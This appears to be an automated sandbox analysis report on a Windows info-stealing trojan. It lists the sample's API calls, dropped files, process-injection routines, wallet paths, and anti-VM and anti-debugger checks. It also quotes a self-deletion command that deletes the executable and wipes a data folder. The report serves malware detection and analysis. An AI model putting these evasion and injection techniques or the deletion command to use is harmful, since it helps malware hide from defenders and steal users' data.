                            Source: njrtdhadawt.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                            Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@6/3@2/2
                            Source: C:\Users\user\Desktop\njrtdhadawt.exeCode function: 0_2_00FF16C8 CreateToolhelp32Snapshot,Process32First,Process32Next,CloseHandle,0_2_00FF16C8
                            Source: C:\Users\user\Desktop\njrtdhadawt.exeCode function: 0_2_00FF197A __ehhandler$?_Copy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@IAEXII@Z,__EH_prolog3_catch,CoCreateInstance,SysAllocString,_wtoi64,SysFreeString,SysFreeString,0_2_00FF197A
                            Source: C:\Users\user\Desktop\njrtdhadawt.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\76561199794498376[1].htmJump to behavior
                            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7688:120:WilError_03
                            Source: C:\Users\user\Desktop\njrtdhadawt.exeFile created: C:\Users\user~1\AppData\Local\Temp\delays.tmpJump to behavior
                            Source: njrtdhadawt.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                            Source: C:\Users\user\Desktop\njrtdhadawt.exeFile read: C:\$Recycle.Bin\S-1-5-21-2246122658-3693405117-2476756634-1003\desktop.iniJump to behavior
                            Source: C:\Users\user\Desktop\njrtdhadawt.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                            Source: njrtdhadawt.exeReversingLabs: Detection: 71%
                            Source: unknownProcess created: C:\Users\user\Desktop\njrtdhadawt.exe "C:\Users\user\Desktop\njrtdhadawt.exe"
                            Source: C:\Users\user\Desktop\njrtdhadawt.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c timeout /t 10 & del /f /q "C:\Users\user\Desktop\njrtdhadawt.exe" & rd /s /q "C:\ProgramData\AAKJKJDGCGDB" & exit
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 10
                            Source: C:\Users\user\Desktop\njrtdhadawt.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c timeout /t 10 & del /f /q "C:\Users\user\Desktop\njrtdhadawt.exe" & rd /s /q "C:\ProgramData\AAKJKJDGCGDB" & exitJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 10Jump to behavior
                            Source: C:\Users\user\Desktop\njrtdhadawt.exeSection loaded: apphelp.dllJump to behavior
                            Source: C:\Users\user\Desktop\njrtdhadawt.exeSection loaded: sspicli.dllJump to behavior
                            Source: C:\Users\user\Desktop\njrtdhadawt.exeSection loaded: wininet.dllJump to behavior
                            Source: C:\Users\user\Desktop\njrtdhadawt.exeSection loaded: rstrtmgr.dllJump to behavior
                            Source: C:\Users\user\Desktop\njrtdhadawt.exeSection loaded: ncrypt.dllJump to behavior
                            Source: C:\Users\user\Desktop\njrtdhadawt.exeSection loaded: ntasn1.dllJump to behavior
                            Source: C:\Users\user\Desktop\njrtdhadawt.exeSection loaded: dbghelp.dllJump to behavior
                            Source: C:\Users\user\Desktop\njrtdhadawt.exeSection loaded: iertutil.dllJump to behavior
                            Source: C:\Users\user\Desktop\njrtdhadawt.exeSection loaded: windows.storage.dllJump to behavior
                            Source: C:\Users\user\Desktop\njrtdhadawt.exeSection loaded: wldp.dllJump to behavior
                            Source: C:\Users\user\Desktop\njrtdhadawt.exeSection loaded: profapi.dllJump to behavior
                            Source: C:\Users\user\Desktop\njrtdhadawt.exeSection loaded: kernel.appcore.dllJump to behavior
                            Source: C:\Users\user\Desktop\njrtdhadawt.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                            Source: C:\Users\user\Desktop\njrtdhadawt.exeSection loaded: winhttp.dllJump to behavior
                            Source: C:\Users\user\Desktop\njrtdhadawt.exeSection loaded: mswsock.dllJump to behavior
                            Source: C:\Users\user\Desktop\njrtdhadawt.exeSection loaded: iphlpapi.dllJump to behavior
                            Source: C:\Users\user\Desktop\njrtdhadawt.exeSection loaded: winnsi.dllJump to behavior
                            Source: C:\Users\user\Desktop\njrtdhadawt.exeSection loaded: urlmon.dllJump to behavior
                            Source: C:\Users\user\Desktop\njrtdhadawt.exeSection loaded: srvcli.dllJump to behavior
                            Source: C:\Users\user\Desktop\njrtdhadawt.exeSection loaded: netutils.dllJump to behavior
                            Source: C:\Users\user\Desktop\njrtdhadawt.exeSection loaded: dnsapi.dllJump to behavior
                            Source: C:\Users\user\Desktop\njrtdhadawt.exeSection loaded: rasadhlp.dllJump to behavior
                            Source: C:\Users\user\Desktop\njrtdhadawt.exeSection loaded: fwpuclnt.dllJump to behavior
                            Source: C:\Users\user\Desktop\njrtdhadawt.exeSection loaded: schannel.dllJump to behavior
                            Source: C:\Users\user\Desktop\njrtdhadawt.exeSection loaded: mskeyprotect.dllJump to behavior
                            Source: C:\Users\user\Desktop\njrtdhadawt.exeSection loaded: msasn1.dllJump to behavior
                            Source: C:\Users\user\Desktop\njrtdhadawt.exeSection loaded: dpapi.dllJump to behavior
                            Source: C:\Users\user\Desktop\njrtdhadawt.exeSection loaded: cryptsp.dllJump to behavior
                            Source: C:\Users\user\Desktop\njrtdhadawt.exeSection loaded: rsaenh.dllJump to behavior
                            Source: C:\Users\user\Desktop\njrtdhadawt.exeSection loaded: cryptbase.dllJump to behavior
                            Source: C:\Users\user\Desktop\njrtdhadawt.exeSection loaded: gpapi.dllJump to behavior
                            Source: C:\Users\user\Desktop\njrtdhadawt.exeSection loaded: ncryptsslp.dllJump to behavior
                            Source: C:\Users\user\Desktop\njrtdhadawt.exeSection loaded: wbemcomn.dllJump to behavior
                            Source: C:\Users\user\Desktop\njrtdhadawt.exeSection loaded: amsi.dllJump to behavior
                            Source: C:\Users\user\Desktop\njrtdhadawt.exeSection loaded: userenv.dllJump to behavior
                            Source: C:\Users\user\Desktop\njrtdhadawt.exeSection loaded: version.dllJump to behavior
                            Source: C:\Users\user\Desktop\njrtdhadawt.exeSection loaded: uxtheme.dllJump to behavior
                            Source: C:\Users\user\Desktop\njrtdhadawt.exeSection loaded: sxs.dllJump to behavior
                            Source: C:\Users\user\Desktop\njrtdhadawt.exeSection loaded: propsys.dllJump to behavior
                            Source: C:\Users\user\Desktop\njrtdhadawt.exeSection loaded: windows.fileexplorer.common.dllJump to behavior
                            Source: C:\Users\user\Desktop\njrtdhadawt.exeSection loaded: ntshrui.dllJump to behavior
                            Source: C:\Users\user\Desktop\njrtdhadawt.exeSection loaded: ntmarta.dllJump to behavior
                            Source: C:\Users\user\Desktop\njrtdhadawt.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                            Source: C:\Users\user\Desktop\njrtdhadawt.exeSection loaded: linkinfo.dllJump to behavior
                            Source: C:\Users\user\Desktop\njrtdhadawt.exeSection loaded: edputil.dllJump to behavior
                            Source: C:\Users\user\Desktop\njrtdhadawt.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                            Source: C:\Users\user\Desktop\njrtdhadawt.exeSection loaded: wintypes.dllJump to behavior
                            Source: C:\Users\user\Desktop\njrtdhadawt.exeSection loaded: appresolver.dllJump to behavior
                            Source: C:\Users\user\Desktop\njrtdhadawt.exeSection loaded: bcp47langs.dllJump to behavior
                            Source: C:\Users\user\Desktop\njrtdhadawt.exeSection loaded: slc.dllJump to behavior
                            Source: C:\Users\user\Desktop\njrtdhadawt.exeSection loaded: sppc.dllJump to behavior
                            Source: C:\Users\user\Desktop\njrtdhadawt.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                            Source: C:\Users\user\Desktop\njrtdhadawt.exeSection loaded: pcacli.dllJump to behavior
                            Source: C:\Users\user\Desktop\njrtdhadawt.exeSection loaded: mpr.dllJump to behavior
                            Source: C:\Users\user\Desktop\njrtdhadawt.exeSection loaded: sfc_os.dllJump to behavior
                            Source: C:\Windows\SysWOW64\timeout.exeSection loaded: version.dllJump to behavior
                            Source: C:\Users\user\Desktop\njrtdhadawt.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0358b920-0ac7-461f-98f4-58e32cd89148}\InProcServer32Jump to behavior
                            Source: Binary string: my_library.pdbU source: njrtdhadawt.exe, chrome.dll.0.dr
                            Source: Binary string: my_library.pdb source: njrtdhadawt.exe, chrome.dll.0.dr
                            Source: C:\Users\user\Desktop\njrtdhadawt.exeCode function: 0_2_00FF80C5 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00FF80C5
                            Source: C:\Users\user\Desktop\njrtdhadawt.exeCode function: 0_2_00FFD855 push ecx; ret 0_2_00FFD868
                            Source: C:\Users\user\Desktop\njrtdhadawt.exeCode function: 0_2_0100EBE2 push ecx; ret 0_2_0100EBF5
                            Source: C:\Users\user\Desktop\njrtdhadawt.exeCode function: 0_2_010027D9 push esi; ret 0_2_010027DB
                            Source: C:\Users\user\Desktop\njrtdhadawt.exeCode function: 0_2_6CD6DE51 push ecx; ret 0_2_6CD6DE64
                            Source: C:\Users\user\Desktop\njrtdhadawt.exeFile created: C:\ProgramData\chrome.dllJump to dropped file
                            Source: C:\Users\user\Desktop\njrtdhadawt.exeFile created: C:\ProgramData\chrome.dllJump to dropped file

                            Hooking and other Techniques for Hiding and Protection

                            barindex
                            Self deletion via cmd or bat file
                            Source: C:\Users\user\Desktop\njrtdhadawt.exeProcess created: "C:\Windows\system32\cmd.exe" /c timeout /t 10 & del /f /q "C:\Users\user\Desktop\njrtdhadawt.exe" & rd /s /q "C:\ProgramData\AAKJKJDGCGDB" & exit
                            Source: C:\Users\user\Desktop\njrtdhadawt.exeProcess created: "C:\Windows\system32\cmd.exe" /c timeout /t 10 & del /f /q "C:\Users\user\Desktop\njrtdhadawt.exe" & rd /s /q "C:\ProgramData\AAKJKJDGCGDB" & exitJump to behavior
                            Source: C:\Users\user\Desktop\njrtdhadawt.exeCode function: 0_2_00FF80C5 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00FF80C5
                            Source: C:\Users\user\Desktop\njrtdhadawt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\njrtdhadawt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                            Malware Analysis System Evasion

                            barindex
                            Yara detected AntiVM3
                            Source: Yara matchFile source: njrtdhadawt.exe, type: SAMPLE
                            Source: Yara matchFile source: 0.2.njrtdhadawt.exe.fe0000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 0.0.njrtdhadawt.exe.fe0000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 00000000.00000002.1550705762.000000000100F000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000000.00000000.1254479624.000000000100F000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                            Source: Yara matchFile source: Process Memory Space: njrtdhadawt.exe PID: 6420, type: MEMORYSTR
                            Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
                            Source: njrtdhadawt.exeBinary or memory string: DIR_WATCH.DLL
                            Source: njrtdhadawt.exeBinary or memory string: SBIEDLL.DLL
                            Source: njrtdhadawt.exeBinary or memory string: API_LOG.DLL
                            Source: njrtdhadawt.exeBinary or memory string: INMPM20IXQUGN9:-?5(\C!7%{->^WALLET_PATHSOFTWARE\MONERO-PROJECT\MONERO-CORE.KEYS\MONERO\WALLET.KEYS\\\*.*\\...\\\\\\\\\\\\HAL9THJOHNDOEDISPLAYAVGHOOKX.DLLAVGHOOKA.DLLSNXHK.DLLSBIEDLL.DLLAPI_LOG.DLLDIR_WATCH.DLLPSTOREC.DLLVMCHECK.DLLWPESPY.DLLCMDVRT32.DLLCMDVRT64.DLL16:38:1216:38:1216:38:1216:38:1216:38:1216:38:12DELAYS.TMP%S%SNTDLL.DLL
                            Source: C:\Users\user\Desktop\njrtdhadawt.exeCode function: OpenInputDesktop,SetThreadDesktop,GetCursorPos,GetCursorPos,Sleep,Sleep,GetCursorPos,Sleep,Sleep,GetCursorPos,0_2_00FE17FD
                            Source: C:\Users\user\Desktop\njrtdhadawt.exeDropped PE file which has not been started: C:\ProgramData\chrome.dllJump to dropped file
                            Source: C:\Windows\SysWOW64\timeout.exe TID: 7728Thread sleep count: 82 > 30Jump to behavior
                            Source: C:\Users\user\Desktop\njrtdhadawt.exeCode function: 0_2_00FF0FFE GetKeyboardLayoutList followed by cmp: cmp eax, ebx and CTI: jbe 00FF1111h0_2_00FF0FFE
                            Source: C:\Users\user\Desktop\njrtdhadawt.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                            Source: C:\Users\user\Desktop\njrtdhadawt.exeCode function: 0_2_00FEC087 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,0_2_00FEC087
                            Source: C:\Users\user\Desktop\njrtdhadawt.exeCode function: 0_2_00FF61AE wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00FF61AE
                            Source: C:\Users\user\Desktop\njrtdhadawt.exeCode function: 0_2_00FEBA79 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00FEBA79
                            Source: C:\Users\user\Desktop\njrtdhadawt.exeCode function: 0_2_00FF5CE8 GetProcessHeap,HeapAlloc,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcatA,lstrcatA,lstrlenA,lstrlenA,0_2_00FF5CE8
                            Source: C:\Users\user\Desktop\njrtdhadawt.exeCode function: 0_2_00FE9DAF FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,_memset,lstrcatA,lstrcatA,lstrcatA,_memset,lstrcatA,lstrcatA,lstrcatA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00FE9DAF
                            Source: C:\Users\user\Desktop\njrtdhadawt.exeCode function: 0_2_00FE1D70 FindFirstFileA,StrCmpCA,StrCmpCA,FindFirstFileA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00FE1D70
                            Source: C:\Users\user\Desktop\njrtdhadawt.exeCode function: 0_2_00FECEEB wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlenA,DeleteFileA,CopyFileA,FindNextFileA,FindClose,0_2_00FECEEB
                            Source: C:\Users\user\Desktop\njrtdhadawt.exeCode function: 0_2_00FF4EA5 wsprintfA,FindFirstFileA,_memset,_memset,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,_memset,lstrcatA,strtok_s,strtok_s,_memset,lstrcatA,strtok_s,PathMatchSpecA,DeleteFileA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,strtok_s,strtok_s,FindNextFileA,FindClose,0_2_00FF4EA5
                            Source: C:\Users\user\Desktop\njrtdhadawt.exeCode function: 0_2_00FF561A wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,FindNextFileA,FindClose,0_2_00FF561A
                            Source: C:\Users\user\Desktop\njrtdhadawt.exeCode function: 0_2_00FED77A FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00FED77A
                            Source: C:\Users\user\Desktop\njrtdhadawt.exeCode function: 0_2_00FEB719 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,0_2_00FEB719
                            Source: C:\Users\user\Desktop\njrtdhadawt.exeCode function: 0_2_6CD6717D FindFirstFileExW,0_2_6CD6717D
                            Source: C:\Users\user\Desktop\njrtdhadawt.exeCode function: 0_2_00FF531F GetLogicalDriveStringsA,_memset,GetDriveTypeA,lstrcpyA,lstrcpyA,lstrcpyA,lstrlenA,0_2_00FF531F
                            Source: C:\Users\user\Desktop\njrtdhadawt.exeCode function: 0_2_00FF11DD GetSystemInfo,wsprintfA,0_2_00FF11DD
                            Source: njrtdhadawt.exe, 00000000.00000002.1551342830.0000000003A27000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\Device\CdRom0\??\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\DosDevices\D:ocal
                            Source: njrtdhadawt.exe, 00000000.00000002.1551342830.00000000039B3000.00000004.00000020.00020000.00000000.sdmp, njrtdhadawt.exe, 00000000.00000002.1551342830.000000000394E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                            Source: njrtdhadawt.exe, 00000000.00000002.1551342830.000000000394E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareVMware
                            Source: njrtdhadawt.exe, 00000000.00000002.1551342830.000000000394E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
                            Source: C:\Users\user\Desktop\njrtdhadawt.exeAPI call chain: ExitProcess graph end nodegraph_0-57233
                            Source: C:\Users\user\Desktop\njrtdhadawt.exeAPI call chain: ExitProcess graph end nodegraph_0-57218
                            Source: C:\Users\user\Desktop\njrtdhadawt.exeAPI call chain: ExitProcess graph end nodegraph_0-58343
                            Source: C:\Users\user\Desktop\njrtdhadawt.exeProcess information queried: ProcessInformationJump to behavior
                            Source: C:\Users\user\Desktop\njrtdhadawt.exeCode function: 0_2_00FFCAB4 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00FFCAB4
                            Source: C:\Users\user\Desktop\njrtdhadawt.exeCode function: 0_2_00FF80C5 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00FF80C5
                            Source: C:\Users\user\Desktop\njrtdhadawt.exeCode function: 0_2_00FE149D mov eax, dword ptr fs:[00000030h]0_2_00FE149D
                            Source: C:\Users\user\Desktop\njrtdhadawt.exeCode function: 0_2_00FF801C mov eax, dword ptr fs:[00000030h]0_2_00FF801C
                            Source: C:\Users\user\Desktop\njrtdhadawt.exeCode function: 0_2_00FF801B mov eax, dword ptr fs:[00000030h]0_2_00FF801B
                            Source: C:\Users\user\Desktop\njrtdhadawt.exeCode function: 0_2_00FE1492 mov eax, dword ptr fs:[00000030h]0_2_00FE1492
                            Source: C:\Users\user\Desktop\njrtdhadawt.exeCode function: 0_2_00FE147A mov eax, dword ptr fs:[00000030h]0_2_00FE147A
                            Source: C:\Users\user\Desktop\njrtdhadawt.exeCode function: 0_2_00FEE883 strtok_s,GetProcessHeap,HeapAlloc,StrStrA,lstrlenA,StrStrA,lstrlenA,StrStrA,lstrlenA,StrStrA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,strtok_s,lstrlenA,0_2_00FEE883
                            Source: C:\Users\user\Desktop\njrtdhadawt.exeCode function: 0_2_010070CE SetUnhandledExceptionFilter,0_2_010070CE
                            Source: C:\Users\user\Desktop\njrtdhadawt.exeCode function: 0_2_00FFCAB4 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00FFCAB4
                            Source: C:\Users\user\Desktop\njrtdhadawt.exeCode function: 0_2_00FFD42C _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00FFD42C
                            Source: C:\Users\user\Desktop\njrtdhadawt.exeCode function: 0_2_6CD66ACC IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_6CD66ACC
                            Source: C:\Users\user\Desktop\njrtdhadawt.exeCode function: 0_2_6CD61726 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_6CD61726
                            Source: C:\Users\user\Desktop\njrtdhadawt.exeCode function: 0_2_6CD611FD IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_6CD611FD

                            HIPS / PFW / Operating System Protection Evasion

                            barindex
                            Yara detected Powershell download and execute
                            Source: Yara matchFile source: Process Memory Space: njrtdhadawt.exe PID: 6420, type: MEMORYSTR
                            Contains functionality to inject code into remote processes
                            Source: C:\Users\user\Desktop\njrtdhadawt.exeCode function: 0_2_00FEF840 _memset,CreateProcessA,VirtualAlloc,GetThreadContext,ReadProcessMemory,VirtualAllocEx,ResumeThread,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,SetThreadContext,ResumeThread,0_2_00FEF840
                            Searches for specific processes (likely to inject)
                            Source: C:\Users\user\Desktop\njrtdhadawt.exeCode function: 0_2_00FF287A __EH_prolog3_catch_GS,CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,0_2_00FF287A
                            Source: C:\Users\user\Desktop\njrtdhadawt.exeCode function: 0_2_00FF29DE CreateToolhelp32Snapshot,Process32First,StrCmpCA,OpenProcess,TerminateProcess,CloseHandle,Process32Next,CloseHandle,0_2_00FF29DE
                            Source: C:\Users\user\Desktop\njrtdhadawt.exeCode function: 0_2_00FF2951 __EH_prolog3_catch_GS,CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,0_2_00FF2951
                            Source: C:\Users\user\Desktop\njrtdhadawt.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c timeout /t 10 & del /f /q "C:\Users\user\Desktop\njrtdhadawt.exe" & rd /s /q "C:\ProgramData\AAKJKJDGCGDB" & exitJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 10Jump to behavior
                            Source: C:\Users\user\Desktop\njrtdhadawt.exeCode function: 0_2_00FE118E cpuid 0_2_00FE118E
                            Source: C:\Users\user\Desktop\njrtdhadawt.exeCode function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree,0_2_00FF0FFE
                            Source: C:\Users\user\Desktop\njrtdhadawt.exeCode function: GetLocaleInfoA,0_2_0100E144
                            Source: C:\Users\user\Desktop\njrtdhadawt.exeCode function: __calloc_crt,__malloc_crt,_free,__malloc_crt,_free,_free,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_mon,_free,_free,_free,InterlockedDecrement,InterlockedDecrement,_free,_free,0_2_0100980E
                            Source: C:\Users\user\Desktop\njrtdhadawt.exeCode function: GetLocaleInfoA,_LocaleUpdate::_LocaleUpdate,___ascii_strnicmp,__tolower_l,__tolower_l,0_2_0100E00F
                            Source: C:\Users\user\Desktop\njrtdhadawt.exeCode function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat,0_2_01007016
                            Source: C:\Users\user\Desktop\njrtdhadawt.exeCode function: _strlen,_strlen,_GetPrimaryLen,EnumSystemLocalesA,0_2_0100B020
                            Source: C:\Users\user\Desktop\njrtdhadawt.exeCode function: ___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,0_2_01008864
                            Source: C:\Users\user\Desktop\njrtdhadawt.exeCode function: _strlen,_GetPrimaryLen,EnumSystemLocalesA,0_2_0100B087
                            Source: C:\Users\user\Desktop\njrtdhadawt.exeCode function: __getptd,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_strlen,EnumSystemLocalesA,GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoA,strcpy_s,__invoke_watson,GetLocaleInfoA,GetLocaleInfoA,__itow_s,0_2_0100B0C3
                            Source: C:\Users\user\Desktop\njrtdhadawt.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,0_2_0100AB6C
                            Source: C:\Users\user\Desktop\njrtdhadawt.exeCode function: GetLocaleInfoW,_GetPrimaryLen,_strlen,0_2_0100AD08
                            Source: C:\Users\user\Desktop\njrtdhadawt.exeCode function: __getptd,_LcidFromHexString,GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoA,_strlen,GetLocaleInfoA,_strlen,_TestDefaultLanguage,0_2_0100AD63
                            Source: C:\Users\user\Desktop\njrtdhadawt.exeCode function: ___getlocaleinfo,__malloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,GetCPInfo,___crtGetStringTypeA,___crtLCMapStringA,___crtLCMapStringA,_memmove,_memmove,_memmove,InterlockedDecrement,_free,_free,_free,_free,_free,_free,_free,_free,_free,InterlockedDecrement,0_2_0100A5E0
                            Source: C:\Users\user\Desktop\njrtdhadawt.exeCode function: __getptd,_LcidFromHexString,GetLocaleInfoA,0_2_0100AC61
